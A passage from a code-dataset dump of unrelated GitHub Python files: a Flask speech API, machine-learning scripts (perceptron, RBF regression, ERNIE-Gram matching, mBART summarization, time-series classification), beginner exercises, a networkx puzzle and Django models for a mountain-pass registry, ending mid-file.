self.HideLastWindow()\n self.mainMenuFrame.pack(fill = \"both\", expand = 1)\n self.HideNavBar()\n\n self.currentSubWindow = Constants.mainMenuSub\n\n def Planner(self, parent: Frame):\n self.HideLastWindow()\n parent.pack(fill = \"both\", expand = 1)\n self.ShowNavBar()\n\n self.currentSubWindow = Constants.plannerSub\n pass\n\n def Account(self, parent: Frame):\n self.HideLastWindow()\n parent.pack(fill = \"both\", expand = 1)\n self.ShowNavBar()\n\n self.currentSubWindow = Constants.accountSub\n pass\n\n def Investment(self, parent: Frame):\n self.HideLastWindow()\n parent.pack(fill = \"both\", expand = 1)\n self.ShowNavBar()\n\n self.currentSubWindow = Constants.investmentSub\n pass\n\n\nif __name__ == \"__main__\":\n print(\"Please run main.py instead\")\n pass\n","repo_name":"TheSorrowRaven/Mini_IT_Project","sub_path":"Mini_IT_Project/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":13723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70524289066","text":"from flask import Flask, request, jsonify, make_response, send_from_directory\n\nimport librosa\nimport soundfile as sf\nimport os\nimport io\nimport wave\nimport numpy as np\nimport speech_recognition as sr\nfrom flask_cors import CORS\nfrom gtts import gTTS\nfrom werkzeug.utils import secure_filename\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route(\"/api/text-to-speech/\", methods=[\"GET\"])\ndef get_audio(fileName):\n # Appending app path to upload folder path within app root folder\n uploads = app.root_path\n # Returning file from appended path\n return send_from_directory(uploads, fileName, as_attachment=True)\n\n\n@app.route(\"/api/text-to-speech\", methods=[\"GET\", \"POST\"])\ndef index():\n if request.method == \"GET\":\n try:\n url = \"http://127.0.0.1:5000/api/text-to-speech/generated-speech.wav\"\n return make_response(jsonify({\"url\": url})), 200\n\n except Exception as err:\n error_message = \"An error occurred: \" + str(err)\n return make_response(jsonify({\"error\": error_message}), 500)\n else:\n try:\n dir_name = \"./\"\n test = os.listdir(dir_name)\n\n for item in test:\n if item.endswith(\".wav\"):\n os.remove(os.path.join(dir_name, item))\n\n text_data = request.get_json()[\"textData\"]\n random = round(np.random.rand() * 100000)\n generated_speech = f\"generated-speech-{random}.wav\"\n print(\"text_data\", text_data)\n # Mengkonversi teks menjadi suara menggunakan Google Text-to-Speech\n # Parameter lang: kode bahasa\n tts = gTTS(text_data, lang=\"id\")\n\n # Menyimpan file suara\n tts.save(generated_speech) # Save hasil suara menggunakan TTS\n\n y, sr = librosa.load(generated_speech)\n sf.write(\n generated_speech, y, sr\n ) # Hasil save dari TTS, dibuka dan ditulis ulang oleh librosa\n\n res = {\"fileName\": generated_speech, \"message\": \"Succes generated\"}\n return make_response(jsonify(res)), 200\n except Exception as err:\n error_message = \"An error occurred: \" + str(err)\n return make_response(jsonify({\"error\": error_message}), 500)\n\n@app.route(\"/api/speech-to-text\", methods=[\"POST\"])\ndef speech_to_text():\n recognizer = sr.Recognizer()\n audio_file = request.files[\"audio\"].read()\n # print(audio_file)\n # audio_file = request.files['name']\n # print('audio_file ==>>', audio_file)\n # audio_file = io.BytesIO(audio_file)\n # print(\"audio_file ==>>\", audio_file)\n # # Save the audio Blob as a file in the uploads folder\n # filename = secure_filename(\"uploaded_audio.wav\")\n # file_path = 
os.path.join(\"./temp/\", filename)\n file_path = \"./temp/tmp.wav\"\n try:\n with open(file_path, \"wb\") as f:\n f.write(audio_file)\n print(10*'<<===='+'Done')\n except Exception as err:\n print(\"Error =======>>> \", err)\n\n try:\n x, _ = librosa.load(file_path, sr=16000)\n sf.write(file_path, x, 16000)\n wave.open(file_path, \"r\")\n print('audio file =====>>> loaded')\n except Exception as err:\n print(\"Error =======>> \", err)\n\n with sr.AudioFile(file_path) as source:\n audio_data = recognizer.record(source)\n try:\n text = recognizer.recognize_google(audio_data, language=\"id-ID\")\n return jsonify({\"text\": text})\n except sr.UnknownValueError:\n print(7 * \"=======#\" + \"Speech Recognition could not understand audio\")\n return jsonify({\"error\": \"Speech Recognition could not understand the audio\"}), 400\n except sr.RequestError as e:\n print(7 * \"=======#\" + e)\n return jsonify({\"error\": f\"Speech Recognition request failed: {e}\"}), 500\n except Exception as err:\n print(\"Error ========> \", err)\n","repo_name":"ricky3knowhere/TTS_flask_api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71354973546","text":"import numpy\r\n\r\nclass NaiveCyclePLA(object):\r\n def __init__(self, dimension, count):\r\n self.__dimension = dimension\r\n self.__count = count\r\n\r\n # get data\r\n def train_matrix(self, path):\r\n training_set = open(path)\r\n x_train = numpy.zeros((self.__count, self.__dimension))\r\n y_train = numpy.zeros((self.__count, 1))\r\n x = []\r\n x_count = 0\r\n for line in training_set:\r\n # add 1 dimension manually\r\n x.append(1)\r\n for str in line.split(' '):\r\n if len(str.split('\\t')) == 1:\r\n x.append(float(str))\r\n else:\r\n x.append(float(str.split('\\t')[0]))\r\n y_train[x_count, 0] = int(str.split('\\t')[1].strip())\r\n x_train[x_count, :] = x\r\n x = []\r\n x_count += 1\r\n return x_train, y_train\r\n\r\n def iteration_count(self, path):\r\n count = 0\r\n x_train, y_train = self.train_matrix(path)\r\n w = numpy.zeros((self.__dimension, 1))\r\n # loop until all x are classified right\r\n while True:\r\n flag = 0\r\n for i in range(self.__count):\r\n if numpy.dot(x_train[i, :], w)[0] * y_train[i, 0] <= 0:\r\n w += y_train[i, :] * x_train[i, :].reshape(5, 1)\r\n count += 1\r\n flag = 1\r\n if flag == 0:\r\n break\r\n return count\r\n\r\n\r\nif __name__ == '__main__':\r\n perceptron = NaiveCyclePLA(5, 400)\r\n print(perceptron.iteration_count(\"hw1_15_train.dat\"))\r\n","repo_name":"xjwhhh/LearningML","sub_path":"MLFoundation/ex1/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"37"} +{"seq_id":"38683952009","text":"# Create a list with 5 items (names of people) and write a python program to output the 2nd item.\n#Write a python program to loop through the list of countries\n#lists\n#1\nfruits = [\"apple\", \"banana\", \"cherry\",\"orange\", \"berry\", ]\nprint (fruits[1])\n#2\nprint(fruits)\nfruits[0] = \"jackfruit\"\nprint(fruits)\n#3\n#add a new item \nfruits.append(\"grapes\")\nprint(fruits)\n#4\nfruits[2]=\"Bathel\"\nprint(fruits)\n#5\ndel fruits[3]\nprint(fruits)\n#6\nprint(fruits[-1])\n#7\nnumbers=[1,2,3,4,5,6,7]\nprint(numbers[2:5])\n#8\ncountries = [ \"UK\", \"Canada\", \"Australia\", \"Germany\"]\ncountries_new = countries.copy()\nprint(\"Original list:\", 
countries)\nprint(\"Copied list:\", countries_new)\n#9\n#looping through the list\nfor item in countries:\n print(item)\n#10\nAnimals=[\"cow\",\"cat\",\"goat\",\"horse\"] \nAnimals.sort()\nprint(Animals)\nAnimals.sort(reverse=True)\nprint(Animals)\n#11\na_Animals=[]\nfor Animal in Animals:\n if \"a\" in Animal.lower():\n a_Animals.append(Animal)\n\nprint(\"Animals with 'a':\")\nfor Animal in a_Animals:\n print(Animal)\n #12\n#first_name = ['mary', 'vanessa',]\n#last_name= ['nansumba','nak']\n#joined_list = first_name + last_name\n\n#print(joined_list) \n#Tuples\nx=(\"samsung\",\"iphone\",\"tecno\",\"redmi\")\n#print(\"my favorite brand is\",x[1])\n#2\nsecond_last= x[-2]\n#print(second_last)\n#3\nmy_list=list(x)\nmy_list[1]=\"itel\"\nx=tuple(my_list)\n#print(\"the new tuple is\",x)\n#4\nmy_list=list(x)\nmy_list.append(\"Huawei\")\nx=tuple(my_list)\n#print(\"the new tuple is\",x)\n#5\n#for item in x:\n # print(item)\n#6\nnew_tuple =x[1:]\n#print(new_tuple)\n#7\ncities=tuple(['Kampala',\"Jinja\",\"kasangati\",\"kawanda\"])\n#print(cities)\n#8\na,b,c ,d= cities\n#print(b)\n#print(c)\n#print(d)\n#9\n#print(cities[1:4])\n#10\nfirst_name = ['mary', 'vanessa',]\nlast_name= ['nansumba','nak']\ncombined = first_name,last_name\n#print(combined)\n#11\ncolors=(\"black\", \"red\", \"green\", \"yellow\")\nresult=(colors*3)\n#print(result)\n#12\nthistuple =(1,3,7,8,7,5,4,6,8,5)\n#count_8 =thistuple.count(8)\n#print(count_8)\n#Sets\n#1\nbev={\"water\",\"soda\",\"juice\"}\n#2\nbev.add(\"honey\")\nbev.add(\"fanta\")\n#print(bev)\n#3\nmySet ={\"oven\",\"kettle\",\"microwave\",\"refrigator\"}\n#print(\"microwave\"in mySet)\n#4\nmySet.remove(\"kettle\")\n\n#print(mySet)\n#5\n#for item in mySet:\n #print(item)\n#6\nset= {1,2,3,4}\nlist1=[5,6]\nset.update(list1)\n#print(set)\n#7\nage={11,12,13}\nnames={\"vanessa\",\"mary\",\"van\"}\nnew= age.union(names)\n#print(new)\n\n#Strings\n#1\nx= \"vanessa\"\ny=20\njoined = str(y)+x\n#print (joined)\n#2\ntxt= \" Hello, Uganda!\"\nstripped =txt.strip()\n#print(stripped)\n#3\nuppercase = txt.upper()\n#print(uppercase)\n#4\nchanged = txt.replace(\"U\",\"V\")\n#print(changed)\n#5\ny=\"Iam proudly Ugandan\"\nrange_txt= y[1:4]\n#print(range_txt)\n#6\nx='ALL\"Data Scientists\" are cool!\"'\n#print(x)\n\n\n#(Dictionaries)\n#1\n#Shoes = {\n#\"brand\" : \"Nick\",\n#\"color\" : \"black\",\n #\"size\" : 40\n#}\n#print(Shoes[\"size\"])\n#2\n#Shoes[\"brand\"]=\"Adidas\"\n#print(Shoes)\n#3\n#Shoes[\"type\"]=\"sneakers\"\n#print(Shoes)\n#4\n#keys =Shoes.keys()\n#print(keys)\n#5\n#values=Shoes.values()\n#print(values)\n#6\n#if \"size\" in Shoes:\n #print(\"size is present\")\n#7\n#for item in Shoes:\n #print(item)\n#8\n#Shoes.__delitem__(\"color\") \n#print(Shoes) \n#9\n#Shoes.clear()\n#print(Shoes)\n#10\n#new_dictionary={\n #\"name\": \"nansumba\",\n #\"age\": 20,\n #\"favorites\":\"singing\"\n#}\n#dictionary=new_dictionary.copy()\n#print(dictionary)\n#print(new_dictionary)\n#11\n\n#my_dict = {\n #\"person1\": {\n # \"name\": \"John\",\n #\"age\": 30,\n #\"city\": \"New York\"\n # },\n #\"person2\": {\n # \"name\": \"Jane\",\n # \"age\": 25,\n # \"city\": \"Los Angeles\"\n #}}\n#print(my_dict)\n","repo_name":"mary-nessa/Recess","sub_path":"Mary_vanessa/mary_vanessa_nansumba_evening_day3.py","file_name":"mary_vanessa_nansumba_evening_day3.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19429913926","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom rbf import 
RBFRegressor\n\n# Data\nNUM_SAMPLES = 100\nX = np.random.uniform(0., 1., NUM_SAMPLES)\nX = np.sort(X, axis=0)\nnoise = np.random.uniform(-0.1, 0.1, NUM_SAMPLES)\ny = np.sin(2 * np.pi * X) + noise\n\n# # Model\nrbfnet = RBFRegressor(lr=1e-2, k=2)\n# Train\nrbfnet.fit(X, y)\n# Prediction\ny_pred = rbfnet.predict(X)\n# Plotting\nplt.plot(X, y, '-o', label='true')\nplt.plot(X, y_pred, '-o', label='RBF-Net')\nplt.legend()\nplt.tight_layout()\nplt.xlabel(\"Time\")\nplt.ylabel(\"Amplitude\")\nplt.title(\"Sinusoidal Wave Estimation with RBF Regressor\")\nplt.show()\n","repo_name":"Aylarshadbakhsh/Computational-Intelligence-Course","sub_path":"RBF/rbf_regression.py","file_name":"rbf_regression.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31395908177","text":"import csv\nimport numpy as np\nimport datetime\nimport time\nfrom joblib import Parallel, delayed\nimport multiprocessing\nimport matplotlib.pyplot as plt\nimport pdb\n\nfrom sklearn.metrics import classification_report\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import *\nfrom sklearn import preprocessing\nfrom random import shuffle\nfrom sklearn.multiclass import *\nfrom sklearn.externals import joblib\nfrom sklearn.svm import *\nfrom sklearn import tree\nfrom sklearn.preprocessing import normalize\nfrom sklearn.metrics import precision_recall_fscore_support\nimport pickle\nimport binascii\n\nfrom .feature_extractor import *\n#from .randomizer import select_random_samples\nfrom .ploting_classification_report import plot_classification_report\n\nclass TimeSeriesToIR:\n\n def __init__(self, mlb=None, model=RandomForestClassifier(n_estimators=200, max_depth=None, min_samples_split=2, random_state=0)):\n self.mlb = mlb\n self.model = model\n self.num_cores = multiprocessing.cpu_count()\n self.classes_indx = []\n\n def get_binarizer(self):\n return self.mlb\n\n def train_model(self, features, include_feature=None, cluster_filepath=None, training_percent=.4):\n temp = []\n if(include_feature is None):\n temp = features\n else:\n for i in features:\n data = []\n for j in include_feature:\n data.append(i[0][j])\n data = np.array(data)\n temp.append([data, i[1], i[2]])\n\n\n index = range(len(temp))\n num_train = int(training_percent * float(len(index)))\n\n srcids = []\n\n for i in index:\n srcids.append(temp[i][2])\n\n if(cluster_filepath is None):\n X = list()\n Y = list()\n index = np.subtract(np.array(index), 1)\n for a in temp:\n X.append(normalize(np.array(a[0]).reshape((1,-1))).reshape(-1))\n Y.append(a[1][0])\n Y = np.array(Y)\n X = np.array(X)\n shuffle(index)\n X_train, X_test = X[index[:num_train]], X[index[num_train:]]\n Y_train, Y_test = Y[index[:num_train]], Y[index[num_train:]]\n else:\n X_train, X_test = list(), list()\n Y_train, Y_test = list(), list()\n randomness = select_random_samples(\n cluster_filename=cluster_filepath,\n srcids=[x for x in srcids],\n n=num_train,\n use_cluster_flag=1)\n for i in range(len(index)):\n not_in_set = True\n for j in range(len(randomness)):\n if(temp[i][2] == randomness[j]):\n X_train.append(normalize(np.array(temp[i][0]).reshape((1,-1))).reshape(-1))\n Y_train.append(temp[i][1][0])\n not_in_set = False\n if(not_in_set):\n X_test.append(normalize(np.array(temp[i][0]).reshape((1,-1))).reshape(-1))\n Y_test.append(temp[i][1][0])\n X_train = np.array(X_train)\n X_test = np.array(X_test)\n Y_train = 
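rbf_regression.py imports a project-local RBFRegressor that is not part of this record, so as a stand-in, here is the core of RBF regression: Gaussian features around k centres followed by ordinary least squares. The centre count and gamma below are assumed values, not the repo's defaults.

```python
# RBF regression reduced to feature expansion + linear least squares.
import numpy as np

def rbf_features(x, centres, gamma):
    # One Gaussian bump per centre; shape (n_samples, n_centres).
    return np.exp(-gamma * (x[:, None] - centres[None, :]) ** 2)

x = np.sort(np.random.uniform(0.0, 1.0, 100))
y = np.sin(2 * np.pi * x) + np.random.uniform(-0.1, 0.1, 100)

centres = np.linspace(0.0, 1.0, 10)
Phi = rbf_features(x, centres, gamma=50.0)
w, *_ = np.linalg.lstsq(Phi, y, rcond=None)
y_pred = Phi @ w
print("train MSE:", np.mean((y - y_pred) ** 2))
```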
np.array(Y_train)\n Y_test = np.array(Y_test)\n print(X_train.shape)\n print(Y_train.shape)\n self.model.fit(X_train, Y_train)\n Y_pred = self.model.predict(X_test)\n print(include_feature)\n print(\"Weighted \", precision_recall_fscore_support(Y_test, Y_pred, average='weighted'))\n print(\"Macro \", precision_recall_fscore_support(Y_test, Y_pred, average='macro'))\n print(\"Micro \", precision_recall_fscore_support(Y_test, Y_pred, average='micro'))\n print(\"Samples \", precision_recall_fscore_support(Y_test, Y_pred, average='samples'))\n\n def feature_extractor(self, srcids, schema_labels, data_path=\"data/\", num_points=5000):\n return Parallel(n_jobs=self.num_cores)(delayed(features)(self.mlb, srcids[x], schema_labels[x].lower().split(), data_path, num_points)\n for x in range(len(srcids)))\n\n def fit(self, train_features, train_srcids,\n val_srcids, train_tags_dict=None):\n self.ts_to_ir(train_features, train_srcids,\n train_features, val_srcids, True)\n\n def predict(self, test_features, test_srcids):\n return self.ts_to_ir(train_features=None,\n train_srcids=None,\n test_features=test_features,\n test_srcids=test_srcids, \n val=False)\n\n def ts_to_ir (self, train_features=None, train_srcids=None, test_features=None, test_srcids=None, val=False):\n if train_srcids:\n X_train = []\n Y_train = []\n for i in train_srcids:\n for j in train_features:\n if(j[2] == i):\n X_train.append(normalize(np.array(j[0]).reshape((1,-1))).reshape(-1))\n Y_train.append(j[1][0])\n X_train = np.array(X_train)\n Y_train = np.array(Y_train)\n print(X_train.shape)\n print(Y_train.shape)\n self.model.fit(X_train, Y_train)\n\n if test_srcids:\n test_data = []\n\n Y_test = []\n for i in test_srcids:\n for j in test_features:\n if(j[2] == i):\n test_data.append(normalize(np.array(j[0]).reshape((1,-1))).reshape(-1))\n Y_test.append(np.asarray([j[1][0]]))\n Y_pred = self.model.predict(np.array(test_data))\n if val:\n Y_test = np.vstack(Y_test)\n report = classification_report(Y_test, Y_pred)\n lines_val = report.split('\\n')\n\n self.classes_indx = []\n for i in range(len(lines_val[2 : (len(lines_val) - 2)])):\n t = lines_val[i+2].strip().split()\n if len(t) < 2: continue\n # print(float(t[-2]))\n if float(t[1]) < 0.7: continue\n self.classes_indx.append(int(t[0]))\n else:\n print(self.mlb.classes_[self.classes_indx])\n # print(range(len(Y_pred)))\n for temp in Y_pred:\n # print(len(temp))\n for i in range(len(temp)):\n if i not in self.classes_indx:\n temp[i] = 0\n # print(v)\n # temp_pred_proba = self.model.predict_proba(np.array(test_data))\n # Y_proba = []\n # for i in range(temp_pred_proba.shape[1]):\n # temp = []\n # for j in range(temp_pred_proba.shape[0]):\n # temp.append(1 - temp_pred_proba[j][i][0])\n # Y_proba.append(np.array(temp))\n # Y_proba = np.array(Y_proba)\n\n #return self.mlb.classes_, Y_pred, np.array(Y_test)#, Y_proba\n return Y_pred\n\n def ploting(self, Y_pred_val, Y_val, Y_pred_test, Y_test, fig_path=\"temp.png\"):\n report_val = classification_report(Y_val, Y_pred_val)\n report_test = classification_report(Y_test, Y_pred_test)\n plot_classification_report(report_val, report_test, self.mlb.classes_, fig_path=fig_path)\n\n\ndef features(mlb, srcid, data_labels, file_path=\"data/\", num_points=None):\n reader = csv.reader(open(file_path + srcid +\".csv\", \"r\"), delimiter=\",\")\n file_data = list(reader)\n temp = list()\n for y in file_data[1:]:\n temp.append(y[1])\n data = np.array(temp, dtype=\"float\")\n if(data_labels is None):\n Y = None\n else:\n Y = 
mlb.transform([set(data_labels)])\n\n if num_points is None:\n features = get_features(data)\n elif num_points >= len(data):\n features = get_features(data)\n else:\n features = get_features(data[-num_points:])\n\n return features, Y, srcid\n\n","repo_name":"plastering/plastering","sub_path":"plastering/inferencers/scrabble/time_series_to_ir.py","file_name":"time_series_to_ir.py","file_ext":"py","file_size_in_byte":8003,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"7013134793","text":"import time\nimport os\nimport numpy as np\n\nimport paddle\nimport paddle.nn.functional as F\nimport paddle.nn as nn\n\n\nfrom paddlenlp.datasets import load_dataset\nimport paddlenlp\nfrom paddlenlp.data import Stack, Pad, Tuple\nfrom paddlenlp.transformers import LinearDecayWithWarmup\nfrom functools import partial\n\ntokenizer = paddlenlp.transformers.ErnieGramTokenizer.from_pretrained('ernie-gram-zh')\n\ndef convert_example(example, tokenizer, max_seq_length=512, is_test=False):\n\n query, title = example[\"query\"], example[\"title\"]\n\n encoded_inputs = tokenizer(\n text=query, text_pair=title, max_seq_len=max_seq_length)\n\n input_ids = encoded_inputs[\"input_ids\"]\n token_type_ids = encoded_inputs[\"token_type_ids\"]\n\n if not is_test:\n label = np.array([example[\"label\"]], dtype=\"int64\")\n return input_ids, token_type_ids, label\n # 在预测或者评估阶段,不返回 label 字段\n else:\n return input_ids, token_type_ids\n\n\nclass PointwiseMatching(nn.Layer):\n \n # 此处的 pretained_model 在本例中会被 ERNIE-Gram 预训练模型初始化\n def __init__(self, pretrained_model, dropout=None):\n super().__init__()\n self.ptm = pretrained_model\n self.dropout = nn.Dropout(dropout if dropout is not None else 0.1)\n\n # 语义匹配任务: 相似、不相似 2 分类任务\n self.classifier = nn.Linear(self.ptm.config[\"hidden_size\"], 2)\n\n def forward(self,\n input_ids,\n token_type_ids=None,\n position_ids=None,\n attention_mask=None):\n\n # 此处的 Input_ids 由两条文本的 token ids 拼接而成\n # token_type_ids 表示两段文本的类型编码\n # 返回的 cls_embedding 就表示这两段文本经过模型的计算之后而得到的语义表示向量\n _, cls_embedding = self.ptm(input_ids, token_type_ids, position_ids,\n attention_mask)\n\n cls_embedding = self.dropout(cls_embedding)\n\n # 基于文本对的语义表示向量进行 2 分类任务\n logits = self.classifier(cls_embedding)\n probs = F.softmax(logits)\n\n return probs\n\ndef predict(model, data_loader):\n \n batch_probs = []\n\n # 预测阶段打开 eval 模式,模型中的 dropout 等操作会关掉\n model.eval()\n\n with paddle.no_grad():\n for batch_data in data_loader:\n input_ids, token_type_ids = batch_data\n input_ids = paddle.to_tensor(input_ids)\n token_type_ids = paddle.to_tensor(token_type_ids)\n \n # 获取每个样本的预测概率: [batch_size, 2] 的矩阵\n batch_prob = model(\n input_ids=input_ids, token_type_ids=token_type_ids).numpy()\n\n batch_probs.append(batch_prob)\n batch_probs = np.concatenate(batch_probs, axis=0)\n\n return batch_probs\n\n\n# 预测数据的转换函数\n# predict 数据没有 label, 因此 convert_exmaple 的 is_test 参数设为 True\ntrans_func = partial(\n convert_example,\n tokenizer=tokenizer,\n max_seq_length=512,\n is_test=True)\n\n# 预测数据的组 batch 操作\n# predict 数据只返回 input_ids 和 token_type_ids,因此只需要 2 个 Pad 对象作为 batchify_fn\nbatchify_fn = lambda samples, fn=Tuple(\n Pad(axis=0, pad_val=tokenizer.pad_token_id), # input_ids\n Pad(axis=0, pad_val=tokenizer.pad_token_type_id), # segment_ids\n): [data for data in fn(samples)]\n\n# 加载预测数据\ntest_ds = load_dataset(\"lcqmc\", splits=[\"test\"])\n\nbatch_sampler = paddle.io.BatchSampler(test_ds, batch_size=32, shuffle=False)\n\n# 生成预测数据 data_loader\npredict_data_loader 
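The mlb object threaded through TimeSeriesToIR is a fitted sklearn MultiLabelBinarizer; a tiny sketch with an invented tag vocabulary shows what the mlb.transform call in the features() helper above returns.

```python
# Tag sets in, fixed-length 0/1 rows out; column order follows mlb.classes_.
from sklearn.preprocessing import MultiLabelBinarizer

mlb = MultiLabelBinarizer()
mlb.fit([{"temperature", "sensor"}, {"setpoint"}, {"zone", "sensor"}])
print(mlb.classes_)                              # ['sensor' 'setpoint' 'temperature' 'zone']
print(mlb.transform([{"zone", "temperature"}]))  # [[0 0 1 1]]
```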
=paddle.io.DataLoader(\n dataset=test_ds.map(trans_func),\n batch_sampler=batch_sampler,\n collate_fn=batchify_fn,\n return_list=True)\n\npretrained_model = paddlenlp.transformers.ErnieGramModel.from_pretrained('ernie-gram-zh')\n\nmodel = PointwiseMatching(pretrained_model)\n\nstate_dict = paddle.load(\"./ernie_gram_zh_pointwise_matching_model/model_state.pdparams\")\n\nmodel.set_dict(state_dict)\n\n# 同时将预测结果输出到终端,便于大家直观感受模型预测效果\ntest_ds = load_dataset(\"lcqmc\", splits=[\"test\"])\n\n# 执行预测函数\ny_probs = predict(model, predict_data_loader)\n\n# 根据预测概率获取预测 label\ny_preds = np.argmax(y_probs, axis=1)\n\nwith open(\"lcqmc.tsv\", 'w', encoding=\"utf-8\") as f:\n f.write(\"index\\tprediction\\n\") \n for idx, y_pred in enumerate(y_preds):\n f.write(\"{}\\t{}\\n\".format(idx, y_pred))\n text_pair = test_ds[idx]\n text_pair[\"label\"] = y_pred\n # print(text_pair)\n# 打印其中的一条内容\nprint(text_pair)\n\n","repo_name":"PaddlePaddle/awesome-DeepLearning","sub_path":"Paddle_Industry_Practice_Sample_Library/Semantic_Matching/code/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4696,"program_lang":"python","lang":"zh","doc_type":"code","stars":2544,"dataset":"github-code","pt":"37"} +{"seq_id":"4401325022","text":"import networkx as nx\nimport matplotlib.pyplot as plt\n\nwith open('input', 'r') as f:\n text = f.readlines()\n\nG = nx.Graph()\n\nfor line in text:\n node, neighbors = line.strip().split(' <-> ')\n\n G.add_edges_from([(node, neighbor) for neighbor in neighbors.split(', ')])\n\nnx.draw(G, node_size=5)\nplt.savefig('graph.png')\n\nprint(len(nx.node_connected_component(G, '0')))\nprint(nx.number_connected_components(G))\n","repo_name":"ngoldbaum/advent_of_code_2017","sub_path":"day_12/pipes.py","file_name":"pipes.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20648863210","text":"import json\nfrom torch.utils.data import Dataset\n\n\nclass MBartSummarizationDataset(Dataset):\n def __init__(\n self,\n input_file,\n tokenizer,\n max_source_tokens_count,\n max_target_tokens_count,\n src_lang=\"ru_RU\",\n tgt_lang=\"ru_RU\"\n ):\n self.pairs = []\n with open(input_file, \"r\") as f:\n for line in f:\n record = json.loads(line)\n source = record[\"text\"]\n target = record.get(\"summary\", None)\n self.pairs.append((source, target))\n self.tokenizer = tokenizer\n self.max_source_tokens_count = max_source_tokens_count\n self.max_target_tokens_count = max_target_tokens_count\n self.src_lang = src_lang\n self.tgt_lang = tgt_lang\n\n def __len__(self):\n return len(self.pairs)\n\n def __getitem__(self, index):\n source, target = self.pairs[index]\n batch = self.tokenizer.prepare_seq2seq_batch(\n [source],\n src_lang=self.src_lang,\n tgt_lang=self.tgt_lang,\n tgt_texts=[target],\n return_tensors=\"pt\",\n padding=\"max_length\",\n truncation=True,\n max_length=self.max_source_tokens_count,\n max_target_length=self.max_target_tokens_count)\n return {\n \"input_ids\": batch[\"input_ids\"][0],\n \"attention_mask\": batch[\"attention_mask\"][0],\n \"labels\": batch[\"labels\"][0]\n }\n","repo_name":"IlyaGusev/summarus","sub_path":"external/mbart_hf_scripts/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"37"} +{"seq_id":"17846211489","text":"from django.db import models\n\nclass Uzers(models.Model):\n family = models.CharField(max_length=20, 
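The pipes.py record above boils down to two networkx queries; the same calls on a made-up edge list:

```python
# Size of the component containing node "0", and the total component count.
import networkx as nx

G = nx.Graph()
G.add_edges_from([("0", "2"), ("2", "3"), ("4", "5")])
print(len(nx.node_connected_component(G, "0")))  # -> 3
print(nx.number_connected_components(G))         # -> 2
```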
help_text='обязательное поле', verbose_name='Фамилия', blank=False)\n    name = models.CharField(max_length=20, help_text='обязательное поле',verbose_name='Имя', blank=False)\n    patronymic = models.CharField(max_length=20, help_text='обязательное поле',verbose_name='Отчество', blank=False)\n    email = models.EmailField(max_length=50, help_text='обязательное поле',verbose_name='эл.почта', blank=False, unique=True)\n    cell = models.BigIntegerField(help_text='обязательное поле в формате 7903ххххххх', blank=False, verbose_name='сотовый')\n    def __str__(self):\n        s = '{' + f'\"family\": \"{self.family}\", \"name\": \"{self.name}\", \"patronymic\": \"{self.patronymic}\",' \\\n            f'\"email\": \"{self.email}\", \"cell\": {self.cell}' + '}'\n        return s\n\nclass Coords(models.Model):\n    longitude = models.FloatField(help_text='обязательное поле',blank=False, verbose_name='долгота')\n    latitude = models.FloatField(help_text='обязательное поле',blank=False, verbose_name='широта')\n    height = models.IntegerField(help_text='обязательное поле',blank=False, verbose_name='высота')\n    def __str__(self):\n        s = '{'+ f'\"longitude\": {self.longitude}, \"latitude\": {self.latitude}, \"height\": {self.height}'+'}'\n        return s\n\n\nclass Img(models.Model):\n    about_1 = models.CharField(help_text='обязательное поле', max_length=100, verbose_name='описание фото_1', blank=False)\n    pic_1 = models.URLField(help_text='обязательное поле, url фото', verbose_name='ссылка на фото_1', blank=False)\n    about_2 = models.CharField(default='', max_length=100, verbose_name='описание фото_2', blank=True)\n    pic_2 = models.URLField(default='', verbose_name='ссылка на фото_2', blank=True)\n    about_3 = models.CharField(default='', max_length=100, verbose_name='описание фото_3', blank=True)\n    pic_3 = models.URLField(default='', verbose_name='ссылка на фото_3', blank=True)\n\n    def __str__(self):\n        s = '{' + f'\"about_1\": \"{self.about_1}\", \"pic_1\": \"{self.pic_1}\", \"about_2\": \"{self.about_2}\",' \\\n            f'\"pic_2\": \"{self.pic_2}\", \"about_3\": \"{self.about_3}\", \"pic_3\": \"{self.pic_3}\"' + '}'\n        return s\n\n\nclass PerevalAdded(models.Model):\n\n    status_list = (('new', 'новый'),('pending', 'в работе'), ('accepted', 'принят'), ('rejected', 'отклонён'))\n    difficult_list = (('', 'не указано'), ('1a', '1А'), ('1b', '1Б'), ('2a', '2А'), ('2b', '2Б'), ('3a', '3А'), ('3b', '3Б'),\n                      ('4a', '4А'),('4b', '4Б'), ('5a', '5А'), ('5b', '5Б'), ('6a', '6А'), ('6b', '6Б'))\n\n    # CharField requires max_length; without it Django raises fields.E120.\n    status = models.CharField(max_length=10, default='new', blank=False, choices=status_list, verbose_name='статус модерации')\n    point = models.OneToOneField(Coords, verbose_name='Координаты', related_name='xyz', on_delete=models.CASCADE)\n    images = models.OneToOneField(Img, on_delete=models.CASCADE)\n    beautyTitle = models.CharField(max_length=200, help_text='обязательное поле', verbose_name='тип объекта', blank=False)\n    title = models.CharField(max_length=200, help_text='обязательное поле', verbose_name='название', blank=False)\n    other_titles = models.CharField(max_length=200, help_text='обязательное поле', verbose_name='альтернативное название', blank=False)\n    connect_other_titles = models.CharField(max_length=200, verbose_name='что соединяет', blank=True)\n    add_time = models.DateTimeField(auto_now_add=True)\n    user = 